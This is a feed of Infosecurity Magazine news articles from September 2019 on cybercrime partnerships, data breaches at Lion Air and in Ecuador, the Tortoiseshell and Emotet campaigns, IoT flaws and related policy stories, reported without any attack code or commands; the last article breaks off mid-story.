Info Security

Subscribe to Info Security  feed
Updated: 1 hour 28 min ago

FS-ISAC and Europol Partner to Combat Cross-Border Cybercrime

Thu, 09/19/2019 - 10:00
FS-ISAC and Europol Partner to Combat Cross-Border Cybercrime

The Financial Services Information Sharing and Analysis Center (FS-ISAC) and Europol’s European Cybercrime Centre (EC3) have announced a partnership to combat cybercrime within the European financial services sector.

The FS-ISAC is an industry consortium dedicated to reducing cyber-risk in the global financial system, and the EC3 protects European citizens, business and governments from online crime.

The Memorandum of Understanding (MOU) between the two will aim to facilitate and enhance the law enforcement response to financially motivated cyber-criminals targeting banks and other financial institutions through a symbiotic intelligence sharing network.

The partnership is a response to the acceleration of sophisticated cyber-attacks in recent years affecting numerous countries and jurisdictions at once. The MOU will help foster a pan-European approach to intelligence sharing, ensuring the cross-border cooperation necessary for the detection, prevention and reduction of cybercrime. In addition to facilitating information sharing, the agreement will also enable education and resilience through training exercises and informational summits.

“Cyber-criminals are increasingly targeting financial services and institutions to the cost of citizens and businesses across the EU,” said Steven Wilson, head of EC3. “It is crucial to bring key stakeholders around the table to improve the coordinated response; this MOU with FS-ISAC builds a platform to allow us to do exactly that.”

Ray Irving, managing director of FS-ISAC, added: “Accelerated global digitalization combined with the growing sophistication of cyber-criminals demands a more concerted approach from both the public and private sector. Through a collaborative peer-to-peer network, FS-ISAC and EC3 are enabling intelligence sharing to better safeguard the global financial system.”

Categories: Cyber Risk News

NCSC: Nation State University Attacks Could Harm UK

Thu, 09/19/2019 - 09:30
NCSC: Nation State University Attacks Could Harm UK

The UK’s National Cyber Security Centre (NCSC) has been forced to issue a new report detailing the threat to the country’s universities from cyber-criminals and nation state operatives.

The NCSC argued that, while the sector has traditionally been one of the most open and outward-facing, both in terms of culture and technology, this makes the attackers’ job even easier.

The main threats are from untargeted cybercrime raids, such as ransomware and bulk personal info theft via phishing, and targeted ones like Business Email Compromise (BEC). However, it also highlighted the challenge posed by nation state hackers looking to steal cutting-edge research and IP.

“While it is highly likely that cybercrime will present the most evident difficulties for universities, state-sponsored espionage will likely cause greater long-term damage. This is particularly true for those universities which prize innovation and research partnerships. This damage will extend to the UK’s larger national interest and to those researchers whose work may give others the chance to 'publish first',” the report argued.

“Nation states almost certainly target universities for the data and information they hold. Cyber offers a deniable route to obtain information that is otherwise unavailable to them. It is likely exploited instead of, or in conjunction with, traditional routes to gain access to research, such as partnering, ‘seconded students,' or direct investment.”

The NCSC warned that attacks on UK universities by nation states could even threaten the long-term health of the country itself.

“There's a realistic possibility that the threat will increase in-line with increased scrutiny of foreign direct investment and the minimizing of other avenues to gain insight and advantage,” it added.

The GCHQ spin-off urged university IT teams to focus on: improving user security awareness; enhancing access controls, especially for sensitive data stores; and to revisit network design to segment high-value information.

Iranian hackers have been among the most prolific attackers of university IT systems: just last week more info emerged on the Cobalt Dickens group, which is targeting at least 380 universities worldwide in a major new phishing operation.

Categories: Cyber Risk News

Lion Air Breach Hits Millions of Passengers

Thu, 09/19/2019 - 08:40
Lion Air Breach Hits Millions of Passengers

Tens of millions of passengers from at least two Asian airlines have had their personal data compromised after workers at the parent company left them exposed via an AWS server, it has emerged.

Although it’s unclear how long the data had been exposed for, security researchers have pointed to at least 35 million records circulating online and linked to an individual with the moniker “Spectre.”

They belong mainly to passengers of Lion Air companies Malindo Air and Thai Lion Air, and include names, dates of birth, phone numbers, emails, addresses, passport numbers and expiration dates, and more.

There are suggestions that a third Lion Air brand, Batik Air, may also be affected.

An official statement from Malindo Air reveals little except that, along with AWS and the airline’s e-commerce partner GoQuo, it is investigating.

“Malindo Air has put in adequate measures to ensure that the data of our passengers is not compromised in line with the Malaysian Personal Data Protection Act 2010. We also do not store any payment details of our customers in our servers and are compliant with the Payment Card Industry (PCI) Data Security Standard (DSS),” it claimed.

“We are in the midst of notifying the various authorities both locally and abroad including CyberSecurity Malaysia. Malindo Air is also engaging with independent cybercrime consultants to investigate and report into this incident.”

The firm urged its passengers to change passwords on their Malindo Miles accounts and basically sit tight.

Reports suggest a misconfigured S3 bucket was again responsible for the security snafu, perhaps dating back to August.

Airlines are an increasingly popular target for hackers, with both Cathay Pacific and BA suffering major breaches over the past year.

The mistake or oversight that led to the Lion Air breach was most likely a very simple one, argued Stephan Chenette, co-founder and CTO of AttackIQ.

“Companies must do a better job at proactively securing sensitive data, starting with the basics and then building to more mature programs,” he added.

“To protect customer data, organizations should employ continuous security validation tools to identify and prioritize gaps in security that need to be addressed first, and continuously assessing the viability of their security controls to make sure they are enabled, configured correctly and operating effectively at all times.”

The Infosecurity Magazine Online Summit is happening next week! Join thousands of professionals from around the world and gain access to industry leading education sessions covering the latest infosec trends & technology for free. Do not miss this great opportunity to earn upto 12 CPEs in just two days. Register Now http://bit.ly/2XY1eCX

Categories: Cyber Risk News

Barclaycard: So Far, So Good for Strong Customer Authentication

Wed, 09/18/2019 - 17:16
Barclaycard: So Far, So Good for Strong Customer Authentication

Barclaycard has reported no negative impact from introducing Strong Customer Authentication (SCA) last weekend. 

The new user authentication rules mandated by the European Union's revised Payment Services Directive (PSD2) were introduced by the UK's leading acquirer on Saturday, September 14. 

Barclaycard analyzed transaction data from September 14 and 15 to check what effect the new two-step authentication rules were having. The company found that merchants had not experienced an increase in abandoned transactions, nor had they seen a spike in declined payments.  

"Our data offers encouraging news for merchants, whose transaction volumes have been, so far, unaffected by the go-live of SCA," said Paul Adams, director of acquiring at Barclaycard Payment Solutions.

SCA legislation officially came into force across Europe on September 14; however, the European Banking Authority (EBA) has given each member state the option to apply for extensions. 

One country that took them up on the offer was the UK, which secured an 18-month extension to the deadline. The UK's financial regulator, the Financial Conduct Authority (FCA), announced in August that the country's payments and e-commerce providers would have until March 14, 2021 to achieve full compliance. 

Action will not be taken by the FCA before that date against firms that haven't implemented SCA, provided that "there is evidence that they have taken the necessary steps to comply with the plan." However, the FCA is expecting third-party providers to implement SCA for online banking by March 14, 2020.

The new SCA legislation requires that all European Economic Area (EEA) transactions go through a two-factor authentication process, unless they qualify for an exemption. Transactions that are exempt include contactless payments below €50/£30; payments made at unattended terminals, such as parking lot payment machines; and recurring payments of the same value to the same merchant, such as subscription payments.

Customers can also skip two-factor authentication for payments made to trusted merchants by whitelisting that merchant with their issuer. 

To help merchants prepare for the changes required by SCA, Barclaycard, which handles nearly half of the nation’s credit and debit card transactions, has launched Barclaycard Transact, which went live over the weekend.

The fraud protection solution allows businesses to benefit from SCA exemptions while making sure that all high-risk transactions still go through two-factor authentication, in accordance with the regulation.

Adams said: "We have designed Transact to help our customers get the most out of the incoming regulation, by enabling them to provide a smooth payment experience for their shoppers, while at the same time reducing risk and managing fraud."

Categories: Cyber Risk News

New Attack Group Targets Saudi IT Providers

Wed, 09/18/2019 - 15:50
New Attack Group Targets Saudi IT Providers

A previously undocumented threat group has been mounting what appear to be supply-chain attacks against IT providers in the Middle East.

Since July 2018, Tortoiseshell Group has targeted at least 11 organizations, using a deadly mix of custom-made and off-the-shelf malware. The majority of the companies to come under virtual fire are based in Saudi Arabia.

Tortoiseshell's nefarious activities were spotted by researchers at Symantec, who have recorded activity stemming from the group as recently as July 2019. 

At two of the organizations unfortunate enough to be attacked by Tortoiseshell, several hundred network computers ended up being infected with malware. Researchers believe that this unusually large number of compromised consoles is indicative of the group's desire to infiltrate particular computers. 

The exact intentions of the attackers are unknown, though Symantec's researchers believe that the threat group's end goal was to compromise the computers belonging to the customers of the IT firms targeted. And you can bet that they weren't going to all this trouble just to change people's screensavers to a goofy picture of an adorable puppy. 

Evidence gathered by the researchers suggests that the attackers were able to gain domain admin–level access to the networks of at least two of the IT providers upon which they preyed.  

Gavin O'Gorman, an investigator with Symantec Security Response, said: "Tortoiseshell deployed its information-gathering tools to the Netlogon folder on a domain controller, on at least two victim networks. This results in the information-gathering tools' being executed automatically when a client computer logs into the domain. 

"This activity indicates the attackers had achieved domain admin–level access on these networks, meaning they had access to all machines on the network."

Highlighting the inherent danger in hackers' gaining access at this level, O'Gorman said: "Shamoon is a good example of one of the worst-case scenarios, where an attacker can wipe every computer on a network by obtaining domain-level access."

The unique component used by Tortoiseshell is a piece of malware called Backdoor.Syskit, which is run with the "-install" parameter to install itself. Once it has settled its virtual butt on the couch of a computer, the malware collects and sends the machine’s IP address, operating system name and version, and MAC address to the C&C server. 

Tortoiseshell's last observed activity occurred in July, but there's every chance they'll be back for more.

O'Gorman said: "Groups tend to not go away, but rather they use different tools, and so it becomes difficult to connect their various attacks. For some groups we have been able to identify their activity spanning more than 10 years."

Categories: Cyber Risk News

US Cybersecurity Firm to Create 52 Jobs in Ireland

Wed, 09/18/2019 - 15:16
US Cybersecurity Firm to Create 52 Jobs in Ireland

An American cybersecurity consulting firm has opened its first overseas site in the southern Irish city of Kilkenny.

The new office in the Republic of Ireland will become the European Headquarters and Security Operations Centre (SOC) for growing company Security Risk Advisors (SRA). SOC's current staff of three will grow to seven by mid-October and is expected to swell to 52 over the next five years. 

Having an office in Europe allows SRA to offer around-the-clock system monitoring to its US-based clients. It will also help the company support its growing European clientele and is likely to attract new customers east of the Atlantic. 

SRA's managing director, Tim Wainwright, said: "The proximity to top colleges and industry-leading companies, in addition to the quality of life in the South East region, made the decision to open our first international office in Kilkenny an easy one."

Wainwright has already chosen his favorite local watering hole, and the honor goes to Cleere’s Bar & Theatre in Kilkenny’s Irishtown. 

Support for SRA's international expansion is being provided by Ireland's inward investment promotion agency, the IDA

"The IDA walked us through incentives and hosted our initial visit. They introduced us to local stakeholders and helped us fill out paperwork. They have continued to work with us in support of setting up our office," said SRA’s Amanda Larsen. 

Irish minister of state at the Department of Housing, Planning, and Local Government, John Paul Phelan TD, said: "The decision to locate their office here is testament to Kilkenny’s highly skilled workforce, as well as its strong network of nearby educational institutions like Waterford IT and Carlow IT, which provide companies like SRA with the talent they need to succeed and grow.

"This announcement is a great boost for the city, and I wish SRA every success in Kilkenny."

SRA was founded as a virtual organization in Pennsylvania's largest city, Philadelphia, back in 2010, by a home-grown team of four Philly locals. Since then, the company has grown 20% on average every year and now employs around 140 people.

The company's growth strategy of mentoring a large number of university hires was so successful that in 2017 SRA opened a physical office on the city's Market Street. 

Two years of success followed, causing SRA to outgrow its original space. In June of this year the company announced the expansion of its office in Philadelphia to accommodate 25 additional employees, together with the opening of a new site in Rochester, New York.

Indicating that SRA plans to implement a similar growth strategy at their new European HQ, Larsen said: "We will be working closely with the Waterford Institute of Technology and Institute of Technology Carlow. The South East region has such a great amount of tech talent."

Categories: Cyber Risk News

Government Report Warns of AI Policing Bias

Wed, 09/18/2019 - 11:05
Government Report Warns of AI Policing Bias

A new government-backed report has warned that the growing use of automation and machine learning algorithms in policing could be amplifying bias, in the absence of consistent guidelines.

Commissioned by the Centre for Data Ethics and Innovation (CDEI), which sits in the Culture Department, the report from noted think tank the Royal United Services Institute (RUSI) will lead to formal recommendations in March 2020.

It’s based on interviews with civil society organizations, academics, legal experts and police themselves, many of whom are already trialing technology such as controversial AI-powered facial recognition.

The report claimed that use of such tools, and those used in predictive crime mapping and individual risk assessments, can actually amplify discrimination if they’re based on flawed data containing bias.

This could include over-policing of certain areas and a greater frequency of stop and search targeting the black community.

It also warned that the emerging technology is currently being used without any clear over-arching guidance or transparency, meaning key processes for scrutiny, regulation and enforcement are missing.

RUSI claimed that police forces need to carefully consider how algorithmic bias may result in them policing certain areas more heavily, and warned against over-reliance on technology which could reduce the role of case-by-case discretion. It also said that discrimination cases could be brought by individuals unfairly “scored” by algorithms.

“Interviews conducted to date evidence a desire for clearer national guidance and leadership in the area of data analytics, and widespread recognition and appreciation of the need for legality, consistency, scientific validity and oversight,” the report concluded.

“It is also apparent that systematic investigation of claimed benefits and drawbacks is required before moving ahead with full-scale deployment of new technology.”

OpenText head of AI and analytics, Zach Jarvinen, argued that the best way of avoiding bias in AI is to implement “ethical code” at the data collection phase.

“This must begin with a large enough sample of data to yield trustworthy insights and minimize subjectivity. Thus, a robust system capable of collecting and processing the richest and most complex sets of information, including both structured data and unstructured, and textual content, is necessary to generate the most accurate insights,” he added.

“Data collection principles should be overseen by teams representing a rich blend of views, backgrounds, and characteristics (race, gender, etc.). In addition, organizations should consider having an HR or ethics specialist working in tandem with data scientists to ensure that AI recommendations align with the organization’s cultural values.”

Categories: Cyber Risk News

Third of Brits Concerned About Election Interference

Wed, 09/18/2019 - 09:55
Third of Brits Concerned About Election Interference

A third of British adults are concerned about hackers interfering in future general elections or referendums, according to new research from SANS Institute.

The global IT training organization polled over 2000 individuals to better understand their concerns about the impact of cyber-related issues on society.

It found that 34% believe cyber-attackers could influence the democratic process in future.

A long-awaited parliamentary committee report issued earlier this year claimed that while it was difficult to say definitively if there was "successful" interference in the 2016 EU referendum, “there is, however, strong evidence that points to hostile state actors influencing democratic processes.”

Russia in particular came under scrutiny for the pro-leave propaganda circulated by its state-backed media outlets RT and Sputnik.

Election interference can also be more insidious: a senate report out in July argued that Russian hackers likely compromised voting infrastructure in all 50 states ahead of the 2016 Presidential election.

Just a fifth of UK adults responding to the SANS Institute poll said they thought the UK is well prepared to defend itself against future cyber issues, and nearly half (45%) claimed there’s not enough security experts in the workforce to protect the country from attack.

However, less than one in 10 (6%) said they thought being a cybersecurity professional was an important job in society, highlighting the major PR challenge facing the industry in trying to get more people to consider a career in the sector.

Skills shortages currently stand at nearly three million globally, including 142,000 in EMEA, according to (ISC)².

SANS Institute CTO, James Lyne, argued that it is the role of government, industry and parents and teachers to emphasize the important role cybersecurity professionals play in defending democracy and economic growth.

“The findings of the poll demonstrate a lack of awareness of what cybersecurity practitioners do to protect our national interests, economy and personal finances,” he added. “The UK will only be prepared to cope with the evolving geopolitical cyber-frontier if we can educate and nurture greater numbers of cyber-defenders and instil a sense of urgency in that new generation of cybersecurity professionals.”

The research was conducted to promote the beginning of the latest annual Cyber Discovery program, which aims to educate and inspire 13-18-year-olds in the UK to be the cybersecurity stars of tomorrow.

Categories: Cyber Risk News

US Government Sues Edward Snowden Over Book

Wed, 09/18/2019 - 08:45
US Government Sues Edward Snowden Over Book

The US government is suing Edward Snowden for violating a non-disclosure agreement (NDA) in the publication of a new book.

The civil suit alleges that the former government contractor published the book, Permanent Record, without first submitting it to the CIA and NSA for review, as per the agreements he signed. It alleges Snowden has also discussed intelligence matters in public speeches, further violating the NDA.

Yet despite its allegations, the US government doesn’t want to prevent publication of the book; instead it wants to seize all proceeds, naming his publishers as co-defendants so that no money can be transferred to the whistleblower.

“Edward Snowden has violated an obligation he undertook to the United States when he signed agreements as part of his employment by the CIA and as an NSA contractor,” said assistant attorney general Jody Hunt of the Department of Justice’s Civil Division.

“The United States’ ability to protect sensitive national security information depends on employees’ and contractors’ compliance with their non-disclosure agreements, including their pre-publication review obligations. This lawsuit demonstrates that the Department of Justice does not tolerate these breaches of the public’s trust. We will not permit individuals to enrich themselves, at the expense of the United States, without complying with their pre-publication review obligations.”

However, Snowden’s attorney and director of the American Civil Liberties Union (ACLU), Ben Wizer, has hit back, arguing that the book contains no information that hasn’t already been published by “respected news organizations.”

“Had Mr Snowden believed that the government would review his book in good faith, he would have submitted it for review. But the government continues to insist that facts that are known and discussed throughout the world are still somehow classified,” he added.

“Mr Snowden wrote this book to continue a global conversation about mass surveillance and free societies that his actions helped inspire. He hopes that today’s lawsuit by the United States government will bring the book to the attention of more readers throughout the world.”

Categories: Cyber Risk News

New Banking Regs Increase Cyber-Attack Risk

Tue, 09/17/2019 - 17:09
New Banking Regs Increase Cyber-Attack Risk

report released today by Trend Micro has found that new European open-banking rules could leave financial services organizations and their customers more susceptible to cyber-attacks.

The European Union’s Revised Payment Services Directive (PSD2) is designed to give users greater control over their financial data and the option to carry out open banking via a new breed of innovative fintech firms. According to Trend Micro's research, that increased control could come at a heavy cost. 

Vulnerabilities that could be exploited as a result of the EU's PSD2 include public APIs that allow approved third parties to access users' banking data and mobile apps that contain transactional data that could make users targets for phishing attacks.

Another concern raised by the report pertained to financial technology (fintech) firms that have no record on data protection and lack the resources of big banks.

In a quick survey of open-banking fintechs, Trend Micro found them to have an average of 20 employees and no dedicated security professionals. The report suggests that such setups make these fintechs ideal targets for attackers and raise concerns over security gaps in their mobile apps, APIs, data-sharing techniques, and security modules that could be incorrectly implemented.

Bharat Mistry, principal security strategist at Trend Micro, told Infosecurity Magazine: "The worst-case scenario here is that cyber-criminals could very easily develop malicious fake apps, especially for mobile smartphone devices where the App Store provider hasn’t taken sufficient measures to validate the source of the application. Then, using phishing campaigns, hackers could direct users to download and use malicious apps, thereby exposing banking credentials to prying eyes."

Open banking comes with the additional challenge of how and to whom blame should be ascribed when cybercrimes do inevitably occur.   

Mistry said: "Another aspect of this evolving open-banking world is the increasing complexity of proving responsibility when a fraudulent transaction occurs. The fault can potentially lie with the bank, the user, or the third-party provider; how smoothly will communication between these three parties go to resolve any such incident?"

Wherever the blame may lie, Mistry expects customers of financial services providers will expect their providers to shoulder the responsibility of maintaining cybersecurity. 

He said: "Cyber insurance is proving to be popular with organizations who want to offset their cyber liabilities; unfortunately, I cannot see individuals taking out such policies as most people are reluctant to pay for something that they think the service provider or bank should be taking care of."

Categories: Cyber Risk News

Vulnerabilities in IoT Devices Have Doubled Since 2013

Tue, 09/17/2019 - 16:55
Vulnerabilities in IoT Devices Have Doubled Since 2013

A follow-up study into the security of IoT devices has revealed more than twice the number of vulnerabilities as were detected six years ago. 

In the 2013 study SOHOpelessly Broken 1.0, researchers at Independent Security Evaluators (ISE) highlighted 52 vulnerabilities across 13 SOHO wireless routers and network-attached storage (NAS) devices made by vendors including Asus and Belkin.

An examination of routers and NAS products by ISE published yesterday has flagged 125 common vulnerabilities or exposures (CVEs). The vulnerabilities captured by the new research, dubbed SOHOpelessly Broken 2.0, could affect millions of IoT devices.

For their latest study, ISE tested 13 contemporary IoT devices created by a range of manufacturers. Modern versions of several devices tested in the original 2013 study were also studied to determine whether manufacturers had upped their security game.

The results were fairly disappointing, with researchers able to obtain remote root-level access to 12 of the 13 devices tested. Among the weaknesses identified were buffer overflow issues, command injection security flaws, and cross-site scripting (XSS) errors.

"We were expecting to find issues in the devices; however, the number and severity of the issues exceeded those expectations. Our first reaction to a lot of our findings was: 'It can't really be this easy, right?'" said ISE researcher Joshua Meyer. 

Conducting the study has changed how Meyer uses IoT devices. He said: "I will be more selective of any IoT devices I purchase for personal use. I am also more aware of the features provided by my devices and disable all of the ones that aren't necessary to its security."

After completing the study, ISE sent vulnerability reports and proof-of-concept (PoC) codes to affected vendors. While the majority of companies acknowledged the reports, TOTOLINK and Buffalo have not yet responded.  

"Netgear and Drobo only responded to us after we continuously messaged them about the critical security issues in their products," said Rick Ramgattie, lead researcher at ISE.

Asked if any plans were afoot for a SOHOpelessly Broken 3.0, Ramgattie said the team is looking into starting a new IoT/Embedded Device research project mid-2020.

Ramgattie elaborated: "We aren't sure if it is going to be the same format as SOHO 1.0 and SOHO 2.0. We might mix things up and pick a smaller set of manufacturers and narrow in on new attack surfaces we have been wanting to dive into for a long time. 

"We might also research more enterprise devices, different protocols, and more complex data-processing workflows."

Categories: Cyber Risk News

Nevada Students Top First Official National Cyber League College Rankings

Tue, 09/17/2019 - 15:32
Nevada Students Top First Official National Cyber League College Rankings

America's National Cyber League (NCL) has published official college rankings for the very first time, and the University of Nevada has come out on top. 

Cyber-savvy students at the Reno-based university prevailed against 5,026 students from 419 schools across the nation to achieve victory in the NCL's spring 2019 season. This impressive win contributed heavily to Nevada's securing the pole position on the inaugural NCL leaderboard published last week.

In second place was the University of Hawaii at Manoa, followed by California State University at Chico, which took third. Lingering at the bottom of the board in 100th place was Grossmont College, a community college in California.  

The NCL has been challenging high school and college students to demonstrate their cybersecurity skills by taking part in two cybersecurity competitions staged annually since 2011. Entrants step onto a virtual field of competition to solve a series of puzzles based on real-world scenarios. 

Previous challenges included identifying hackers from forensic data, breaking into simulated bank websites, and staging a recovery from a ransomware attack. The University of Nevada's winning team, the Nevada Cyber Club, completed all the challenges set in this year's spring season with 99.26% accuracy. 

Club member and computer science and engineering major Bryson Lingenfelter, speaking after his team's unequivocal victory, said: "I've learned a tremendous amount in three seasons of competing in NCL, and it's a major inspiration for my plans going forward with Cyber Club. NCL is how many of us got started with the club, and I hope to expand our use of competitions as learning tools in the future to engage even more people with cybersecurity." 

Competing in the NCL does more for students than simply give them a chance to vaunt their talent and learn new skills. Thanks to industry-leading cybersecurity skills-evaluation technology from Cyber Skyline, NCL competitors can obtain scouting reports of their performance, which they can use for hiring purposes.

"Cyber competitions like NCL provide a way for cybersecurity students to demonstrate their skills to employers, especially with many entry-level jobs requiring experience," said Franz Payer, CEO of Cyber Skyline.

"The new Cyber Power Rankings highlight the top schools producing new cybersecurity professionals. We're excited for what competitions can do to help address the cyber talent shortage.

Categories: Cyber Risk News

New Test Service Launched to Gauge Tech Skills of Job Candidates

Tue, 09/17/2019 - 12:00
New Test Service Launched to Gauge Tech Skills of Job Candidates

A new testing service has been launched with the aim of gauging and ranking job candidates based on their technical skillsets.

TechRank, created by Pioneer Labs, is run by tech consultants and sources, tests and objectively ranks tech talent, helping companies hire the best and most capable person for tech-based roles. TechRank seeks to eliminate the subjectivity of personality and interview charm and to ensure that jobs are offered based on genuine skillsets.

Candidates take the TechRank test online, opting for the specific area relevant to their skills. Candidates are then logged in the TechRank system and alerted if a suitable job is advertised. Employers can sort candidates by their skill level quicker and more accurately than reading through large numbers of CVs.

TechRank was co-founded by Gurvinder Singh, Co-CEO, Pioneer Labs, and he explained how TechRank was born out of frustration.

“We were finding it highly time-consuming and difficult to find great tech talent. It was a constant problem. So, we asked ourselves what needed to change and how this could be facilitated – the answer was clearly testing. It’s great for both the candidate and the employer. We trailed the system in our own business and found that it worked really well. It made a huge difference to Pioneer Labs so we decided to create a version that other businesses could use – and TechRank was born.”

Speaking to Infosecurity, Singh said: “We are looking to disrupt tech recruitment. We believe tech recruitment has been broken for far too long. It’s been very difficult for employers to be sure they are hiring people with the right skills; skills that are suitable for the specific job they are being asked to do. Some people look great on paper, perform brilliantly at interview, but simply don’t have the level of knowledge required for the job on offer.

“In the future, I believe CVs will become obsolete in the tech industry. Skills matter more than words and finding the best skilled people is where companies, which are trying to build or maintain market share via technology, will be competing most vigorously.”

Categories: Cyber Risk News

Webcam Security Snafus Expose 15,000 Devices

Tue, 09/17/2019 - 11:00
Webcam Security Snafus Expose 15,000 Devices

Researchers have discovered 15,000 private webcams around the globe which could be accessed by anyone with an internet connection, raising serious security and privacy concerns.

Working for Wizcase, white hat Avishai Efrat located the exposed devices from multiple manufacturers including: AXIS net cameras; Cisco Linksys webcam; IP Camera Logo Server; IP WebCam; IQ Invision web camera; Mega-Pixel IP Camera; Mobotix; WebCamXP 5 and Yawcam.

They appear to have been installed by both home users and businesses in multiple countries across Europe, the Americas and Asia.

By failing to put in place even cursory protection on the devices, these owners are exposing not only the webcam streams themselves but also, in some cases where admin access is possible, user information and approximate geolocation. In these cases, Efrat was also theoretically able to remotely control the device view and angle.

Control of such feeds and personal info could allow attackers to rob the premises being monitored, blackmail users, and even steal PII for identity fraud.

The problem lies with the cameras’ remote access functionality. In some cases UPnP was enabled without additional protections like password authentication or IP/MAC address whitelisting, whilst in others unsecured P2P networking was used.

“Web cameras manufacturers strive to use technologies which make the device installation as seamless as possible but this sometimes results in open ports with no authentication mechanism set up. Many devices aren’t put behind firewalls, VPNs, or whitelisted IP access – any of which would deny scanners and arbitrary connections,” explained Wizcase web security expert, Chase Williams.

“If these devices have open network services, then they could be exposed.”

Wizcase urged webcam operators to change the default configuration of their device in order to: whitelist specific IP & MAC addresses to access the web camera, add strong password authentication and disable UPnP if P2P networking is being used.

It also advised users to configure a home VPN network so the webcam would no longer be exposed to the public-facing internet.

Categories: Cyber Risk News

Emotet is Back and Spamming Again

Tue, 09/17/2019 - 09:45
Emotet is Back and Spamming Again

A notorious botnet has begun sending out spam again after a several month hiatus, which could spend bad news for organizations around the world.

Emotet has been dormant for around four months, but starting pumping out spam on Monday morning, with phishing emails sent in German, Polish, English and Italian, according to Malwarebytes.

The firm said that an uptick in command-and-control (C2) server activity forewarned it of a return to the front line for the infamous botnet.

In this new campaign, users are tricked into opening an attached document and enabling macros, triggering a PowerShell command which will try to download Emotet from compromised sites, often those running WordPress.

“Once installed on the endpoint, Emotet attempts to spread laterally, in addition to stealing passwords from installed applications. Perhaps the biggest threat, though, is that Emotet serves as a delivery vector for more dangerous payloads, such as ransomware,” warned Malwarebytes.

“Compromised machines can lay in a dormant state until operators decide to hand off the job to other criminal groups that will attempt to extort large sums of money from their victims. In the past, we’ve seen the infamous Ryuk ransomware being deployed that way.”

Linked to the North Korean Lazarus Group, Ryuk is thought to have made almost $3.8m for its operators in the six months to January 2019.

Like Trickbot, Emotet was originally a banking Trojan that was re-written to function as a malware loader. Its operators sell access to the botnet for clients to use as a malware distribution network.

According to Malwarebytes, Emotet malware was detected and removed over 1.5 million times between January and September 2018 alone. In July last year, the threat became so serious that the US-CERT was forced to release an alert about Emotet and its capabilities.

Categories: Cyber Risk News

Most Port Vulnerabilities Are Found in Three Ports

Tue, 09/17/2019 - 09:03
Most Port Vulnerabilities Are Found in Three Ports

The vast majority of vulnerabilities in ports are found in just three, making it theoretically easier for organizations to defend them against attack, according to Alert Logic.

The security vendor analyzed 1.3 petabytes of security data, over 2.8 billion IDS events, 8.2 million verified incidents, and common vulnerabilities for more than 700 SMB customers, in order to compile its Critical Watch Report for 2019.

It claimed that 65% of vulnerabilities it found in Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) ports are linked to SSH (22/TCP), HTTPS (443/TCP) and HTTP (80/TCP).

RDP/TCP comes in fourth place, which is no surprise as it has already been patched several times by Microsoft, including one for the Bluekeep bug which Redmond warned could provide attackers with WannaCry-like “wormable” capabilities.

The number of vulnerabilities in a port is a good indication of its popularity and it’s no surprise that the top three ports for flaws are also ones exposed to the public-facing internet, Alert Logic said.

However, the findings may provide useful intel for security teams in smaller companies to help them reduce their attack surface quickly and easily.

“As basic guidance, security across all network ports should include defense-in-depth. Ports that are not in use should be closed and organizations should install a firewall on every host as well as monitor and filter port traffic,” the report advised.

“Regular port scans and penetration testing are also best practices to help ensure there are no unchecked vulnerabilities.”

Alert Logic also urged IT security teams to patch and harden any device, software or service connected to ports and to tackle any new vulnerabilities as they appear, as well as changing all default setting and passwords and running regular configuration checks.

The report found that most unpatched vulnerabilities in the SMB space are over a year old, and that misconfigurations, weak encryption and unsupported Windows versions also represent serious risks.

Categories: Cyber Risk News

City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

Mon, 09/16/2019 - 18:46
City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

Officials in the Tennessee city of Germantown have restricted the email account of an alderman who refuses to undergo cybersecurity training. 

Insurance specialist and married father of one Dean Massey was elected to the position of alderman in 2016. His official DMassey@germantown-tn.gov email account was restricted earlier this month after Massey failed to complete a cybersecurity training course.

According to the Commercial Appeal website, all Germantown officials and city employees were asked to complete the 45-minute course by a specific date and were warned that failure to comply would result in their email access being restricted. However, Massey told Infosecurity Magazine that "there was no policy that mandated the cyber training for elected officials."

Explaining why he refused to complete the cybersecurity training after being instructed to do so by the city's IT Director, Massey said: "I was not aware of any alderman having to take the cyber training in the past, so I thought it was unusual for a city employee to suddenly claim the authority to demand that elected officials click a link to take the training this year. 

"I simply disregarded the emails with the training links until I received a notice from the IT Director advising me that he intended to restrict my government email account."

Massey responded to the imposed restriction by setting up a personal email account—dmassey.cityofgermantown@gmail.com—to handle his official city business. Conducting public business from a personal email address does not violate any Tennessee state laws or ethics guidelines. 

Massey's refusal comes in the wake of a July 2019 ransomware attack on the neighboring city of Collierville, which compromised the town's internal servers. 

Commenting on Massey's argument cited by Commercial Appeal that an elected official shouldn't have to comply with a directive from an unelected official, fellow Germantown alderman Rocky Janda told Infosecurity Magazine: "Mr. Massey came up with that reason for not taking the training. This was a city administrator/mayor decision to make it mandatory for all employees and elected officials due to recent local threats. Staff does not make these kinds of decisions on their own." 

Janda, who himself became a victim of cyber-crime when hackers targeted his company with ransomware, added "Mr. Massey just needs to take the training. It's 45 minutes..."

Massey responded to Janda's comments by stating: "All the elected officials have used and/or currently use personal electronic devices and personal emails addresses for government correspondence."

According to Commercial Appeal, Janda has asked the city administration to discuss a potential censure of Massey's actions to encourage a discussion around cybersecurity issues. Massey has also asked for cybersecurity to be added to the administration's agenda for the next meeting, which will take place on September 23.  

Massey, who has never personally been a victim of a cyber-crime, said: "In my experience the threat of hackers and dangers of cybercrime are probably greater than what is reported in the media, but cities should not get a false sense of security by having city employees and elected officials click a link that provides 45 minutes of generic instruction on how to avoid cyber-crimes."

He added: "I think it would be appropriate and more beneficial for a cyber security specialist to give the entire Board of Mayor and Alderman a presentation on cyber security and allow aldermen to discuss whether more should be done."

Categories: Cyber Risk News

Data of Virtually All Ecuadoreans Leaked Online

Mon, 09/16/2019 - 17:00
Data of Virtually All Ecuadoreans Leaked Online

The personal data of almost every citizen of Ecuador has been leaked online in a catastrophic data breach. 

The names, phone numbers, and financial information of approximately 20 million Ecuadoreans were found on an unsecured cloud server by researchers working on a web-mapping project at security company vpnMentor.

The enormous 18GB cache of data included personal information relating to individuals who were deceased as well as to the country's living population of approximately 17 million. Personal information relating to 6.7 million Ecuadorean children was among the data leaked.

Exposed files revealed a large amount of sensitive personally identifiable information, such as family records, marriage dates, education histories, employment records, and official ten-digit government ID numbers called cédulas de identidad.

"This data breach is particularly serious simply because of how much information was revealed about each individual," wrote Noam Rotem and Ran Locar from vpnMentor. "Scammers could use this information to establish trust and trick individuals into exposing more information." 

Tax records and financial records revealing the account balances of customers of a large Ecuadorean bank were among the data breached. 

